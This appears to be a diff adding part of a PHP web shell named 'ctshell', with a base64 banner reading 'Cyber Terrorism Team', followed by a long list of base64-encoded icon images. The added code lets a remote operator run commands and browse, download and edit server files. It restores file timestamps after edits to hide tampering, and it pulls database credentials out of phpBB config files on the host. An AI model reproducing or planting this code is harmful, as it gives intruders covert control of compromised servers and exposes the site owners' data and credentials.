+  switch (ord($str[$i]))
+  {
+case 0:  $a2.="<font class=s2>0</font>"; break;
+case 32: 
+case 10:
+case 13: $a2.="&nbsp;"; break;
+default:  $a2.=htmlspecialchars($str[$i]);
+  }
+  $n++;
+  if ($n == $hexdump_rows)
+  {
+$n = 0;
+if ($i+1<strlen($str)) {$a0.=sprintf("%08X",$i+1)."<br>";}
+$a1.="<br>";
+$a2.="<br>";
+  }
+ }
+ echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4 ".
+"class=sy><tr><td bgcolor=#666666> $a0</td><td bgcolor=000000>".
+"$a1</td><td bgcolor=000000>$a2</td></tr></table><br>";
+}
+$encoded = "";
+if ($base64 == 1)
+{
+ echo "<b>Base64 Encode</b><br>";
+ $encoded = base64_encode($r);
+}
+elseif($base64 == 2)
+{
+ echo "<b>Base64 Encode + Chunk</b><br>";
+ $encoded = chunk_split(base64_encode($r));
+}
+elseif($base64 == 3)
+{
+ echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+ $encoded = base64_encode($r);
+ $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+}
+elseif($base64 == 4)
+{
+}
+if (!empty($encoded))
+{
+ echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+}
+echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+<nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+<P>";
+  }
+  elseif ($ft == "html")
+  {
+if ($white) {@ob_clean();}
+echo $r;
+if ($white) {exit;}
+  }
+  elseif ($ft == "txt")
+  {
+echo "<pre>".htmlspecialchars($r)."</pre>";
+  }
+  elseif ($ft == "ini")
+  {
+echo "<pre>";
+var_dump(parse_ini_file($d.$f,true));
+echo "</pre>";
+  }
+  elseif ($ft == "phpsess")
+  {
+echo "<pre>";
+$v = explode("|",$r);
+echo $v[0]."<br>";
+var_dump(unserialize($v[1]));
+echo "</pre>";
+  }
+  elseif ($ft == "exe")
+  {
+echo "<form action=\"".$sul."act=cmd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"".htmlspecialchars($r)."\"><input type=\"submit\" name=\"submit\" value=\"Execute\">&nbsp;<input type=\"submit\" value=\"View&Edit command\"></form>";
+  }
+  elseif ($ft == "sdb")
+  {
+echo "<pre>";
+var_dump(unserialize(base64_decode($r)));
+echo "</pre>";
+  }
+  elseif ($ft == "code")
+  {
+if (ereg("phpBB 2.(.*) auto-generated config file",$r))
+{
+ $arr = explode("
+",$r);
+ if (count($arr == 18))
+ {
+  include($d.$f);
+  echo "<b>phpBB configuration is detected in this file!<br>";
+  if ($dbms == "mysql4") {$dbms = "mysql";}
+  if ($dbms == "mysql") {echo "<a href=\"".$sul."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+  else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by ctshell";}
+  echo "Parameters for manual connect:<br>";
+  $cfgvars = array(
+  "dbms"=>$dbms,
+  "dbhost"=>$dbhost,
+  "dbname"=>$dbname,
+  "dbuser"=>$dbuser,
+  "dbpasswd"=>$dbpasswd 
+  );
+  foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+ 
+  echo "</b>";
+  echo "<hr size=\"1\" noshade>";
+ }
+}
+echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: #808080;\">";
+if (!empty($white)) {@ob_clean();}
+if ($rehtml) {$r = rehtmlspecialchars($r);} 
+$r = stripslashes($r); 
+$strip = false;
+if(!strpos($r,"<?") && substr($r,0,2)!="<?") {$r="<?php\n".trim($r)."\n?>"; $r = trim($r); $strip = true;}
+$r = @highlight_string($r, TRUE); 
+if ($delspace) {$buffer = str_replace ("&nbsp;", " ", $r);}
+echo $r;
+if (!empty($white)) {exit;}
+echo "</div>";
+  }
+  elseif ($ft == "download")
+  {
+@ob_clean();
+header("Content-type: ctshell");
+header("Content-disposition: attachment; filename=\"".$f."\";"); 
+echo($r); 
+exit;
+  }
+  elseif ($ft == "notepad")
+  {
+@ob_clean();
+header("Content-type: text/plain"); 
+header("Content-disposition: attachment; filename=\"".$f.".txt\";"); 
+echo($r); 
+exit;
+  }
+  elseif ($ft == "img")
+  {
+if (!$white)
+{
+ echo "<center><img src=\"".$sul."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" border=\"1\"></center>";
+}
+else
+{
+ @ob_clean();
+ $ext = explode($f,".");
+ $ext = $ext[count($ext)-1];
+ header("Content-type: image/gif"); 
+ echo($r); 
+ exit;
+}
+  }
+  elseif ($ft == "edit")
+  {
+if (!empty($submit))
+{
+ if ($filestealth) {$stat = stat($d.$f);}
+ if (!is_writable($d.$f) and $autochmod) {@chmod($d.$f,$autochmod);}
+ $fp = fopen($d.$f,"w");
+ if (!$fp) {echo "<b>Can't write to file!</b>";}
+ else
+ {
+  echo "<b>Ñîõðàí¸íü!!!</b>";
+  fwrite($fp,$nfcontent);
+  fclose($fp);
+  if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+  $r = $nfcontent;
+ }
+}
+$rows = count(explode("
+",$r));
+if ($rows < 10) {$rows = 10;}
+if ($rows > 30) {$rows = 30;}
+echo "<form method=\"POST\"><input type=\"submit\" name=\"submit\" value=\"Ñîõðàíèòü\">&nbsp;<input type=\"reset\" value=\"Ñáðîñ\">&nbsp;<br><textarea name=\"nfcontent\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+ }
+}
+if ($act == "phpinfo")
+{
+ ob_end_clean();
+ phpinfo();
+ exit;
+}
+}
+$data = base64_decode("PGNlbnRlcj48Zm9udCBzaXplPTIgY29sb3I9IzAwZmYwMD5DeWJlciBUZXJyb3Jpc20gVGVhbTwvZm9udD48YnI+PGZvbnQgc2l6ZT0yPg0KyOTl/ywg6Ofs5e3l7ej/IOTo5+Dp7eAg6CDx6vDo7/LgIOTu4eDi6Os6PC9mb250PjxpbWcgc3JjPWh0dHA6Ly9vbmxpbmUubWlyYWJpbGlzLmNvbS9zY3JpcHRzL29ubGluZS5kbGw/aWNxPTMzNTk3NjAyMSZpbWc9NSBoZWlnaHQ9MTggd2lkdGg9MTg+PGZvbnQgc2l6ZT0yIGNvbG9yPSNGRkRFMDA+IFJPRE5PQzwvZm9udD48L2NlbnRlcj4=");
+if ($act == "img")
+{
+ @ob_clean();
+ 
+ $arrimg = array(
+"arrow_ltr"=>
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
+"back"=>
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
+"Wg0JADs=",
+"buffer"=>
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
+"change"=>
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
+"zMshADs=",
+"delete"=>
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7",
+"download"=>
+"R0lGODlhEQAPAKIAAO/v8N3e387OzpSt72NzrVFZfCkxUv///yH5BAUUAAcALAAAAAARAA8AAANSe".
+"Grc3uoYAEq4wWZqFtWXVnBehWUhKQ1V4b6uagwsZd/ATO84ru+0k/C3MxCOSIyDZhQ4nYRnZ2UQRJ9".
+"W6aKaxV4F02r1CwWDF2bYyzyVPN6dBAA7",
+"edit"=>
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
+"forward"=>
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
+"WqsJADs=",
+"home"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
+"mode"=>
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
+"refresh"=>
+"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA".
+"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY".
+"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ".
+"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=",
+"search"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
+"setup"=>
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
+"small_dir"=>
+"R0lGODlhDgAQALMPAKt5E8uYM7SBHLyJJMaTLsGOKaRyDJ5sBv/MZ//////ge//rhf/Ub//3kf//m".
+"f///yH5BAEAAA8ALAAAAAAOABAAAARF8MlJq704axo6yUEiJsUVOqiTDIPgSkEjz6MIPMGi7/xyE4q".
+"gcKj4MY7IJONWQDifUAQzSr0NqFErFnp7uASAsMFwKD8iADs=",
+"small_unk"=>
+"R0lGODlhEQAUANUhAOXl1c3MzJiYmCkufnoRE83MzTNOoszLzO4jI/HqQIeGh5iYlxZ7PRh8PXLM".
+"2FRVVMvLyzRNofbHPnsRE+bm1QgJCebl1FRUVFVVVIaGh1VVVQcICCoufoaFhYWGhszMzP///wAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAACEALAAAAAARABQAAAaewJBw".
+"SCwaj0hPZpnxOD2dhdFDsVgBV4tAU+yAvmCwAHQhesNhwQVTFnoVS2gn0/FsIJiht8ORcP4DfxVk".
+"QxkgfIF/gBuEQh6HaF8WjHmOIIYJBF8GIBSUQ49eBAggBg4RniBclo8gE18MDQCDqyGhAFUUuLi0".
+"oCAbFRvAwcCMtWeRYW0hGQcfAc/QBQEFzpUhbBoaGNsP2mtrSOLjSEEAOw==",
+"sort_asc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
+"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
+"sort_desc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
+"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
+"sql_button_drop"=>
+"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
+"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/".
+"AQEAOw==",
+"sql_button_empty"=>
+"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA".
+"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==",
+"sql_button_insert"=>
+"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA".
+"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=",
+"up"=>
+"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg".
+"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV".
+"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==",
+"write"=>
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
+"ext_ani"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP/////MmczMmf/MzJmZZszMzP//zAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARbEMmJAKC4XhCKvRhABJZgACY4oSR3HmdFcQLndaVK7ziu".
+"VQRBYBAI1IKWYrLIJBhwrBqzOHKCotMRcaCbBrRDz+pLHQ65IWOZKE4Lz+hM5SAcDNoZwOBAINxV".
+"EQA7",
+"ext_asp"=>
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
+"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
+"ext_au"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_avi"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM".
+"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4".
+"PYXCyg+V2i44XeRmSfYqsGhAAgA7",
+"ext_bat"=>
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
+"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
+"dmrYAMn1onq/YKpjvEgAADs=",
+"ext_bin"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ".
+"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ".
+"/aZBVOqkpUa/4KisRC6rEgA7",
+"ext_bmp"=>
+"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA".
+"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q".
+"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3".
+"EzWCgwARADs=",
+"ext_cat"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg4CAgAAAAMDAwP///wAA/wAAgACAAAD/AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARdEMk5gQU0IyuOMUV1XYf3ESEgrCwQnGgQAENdjwCBFjO7".
+"Xj9AaYbjFArBme1mKeiQLpWvqdMJosXB1akKbGxSzvXqVXEGNKDAuyGq0NqriyJTW2QaRP3Ozktk".
+"fRQRADs=",
+"ext_cgi"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9".
+"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6".
+"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S".
+"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ".
+"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
